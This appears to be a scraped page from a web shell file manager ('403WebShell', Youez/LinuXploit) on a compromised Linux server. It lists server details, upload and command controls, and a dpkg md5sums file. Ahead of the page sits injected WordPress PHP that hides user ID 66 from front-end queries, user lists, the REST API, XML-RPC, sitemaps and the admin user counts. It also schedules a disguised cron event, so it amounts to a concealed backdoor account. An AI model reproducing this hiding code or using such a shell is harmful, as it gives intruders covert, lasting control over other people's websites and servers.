add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/bsdutils.md5sums
4f04c1ce4a76b7436973bf7ae8a30b3f  usr/bin/logger
34dd2473b22ae3306c5f86c4210a7709  usr/bin/renice
3fb953e00e2320fbf37c71ce7f6b4223  usr/bin/script
618e6be7c6fa33970b048c113909c525  usr/bin/scriptlive
5225577f1ce90e98649b3e91e3bc572a  usr/bin/scriptreplay
19a5c772f0297546d0578e0e5cfc4936  usr/bin/wall
cef6993dcff37806c8aed1c4b7cc97d0  usr/share/bash-completion/completions/logger
971b883266b55869fab7e8aab1b3e3dc  usr/share/bash-completion/completions/renice
176ef4a32b28d854c9eee2a9dcc11f0c  usr/share/bash-completion/completions/script
0c54835d07895d539de4e8ecad05f07e  usr/share/bash-completion/completions/scriptlive
a3890ee025e7e1e948c41da8c8db4259  usr/share/bash-completion/completions/scriptreplay
8fb153c973defc52cae222280b1a0aba  usr/share/bash-completion/completions/wall
f09eda67e79b662d44a59d890716de7c  usr/share/doc/bsdutils/changelog.Debian.gz
4e3ed275af9c214606341bc158e7acf4  usr/share/doc/bsdutils/copyright
51ac1ee0ed35bf99cf543bf46063c4da  usr/share/lintian/overrides/bsdutils
6db2efc4fb3f02219bc665770a91be10  usr/share/man/man1/logger.1.gz
a7e3af78a4404350364fa7ce7543a096  usr/share/man/man1/renice.1.gz
99d72ffd48bed8fbe0e2ae11107f4d93  usr/share/man/man1/script.1.gz
c61a3c4134d86e07c8c29d3be1dc6e83  usr/share/man/man1/scriptlive.1.gz
b66b4fc5f2f5f13fa556f1478152e264  usr/share/man/man1/scriptreplay.1.gz
5caf158b828e956d86e4402f273353e0  usr/share/man/man1/wall.1.gz

Youez - 2016 - github.com/yon3zu
LinuXploit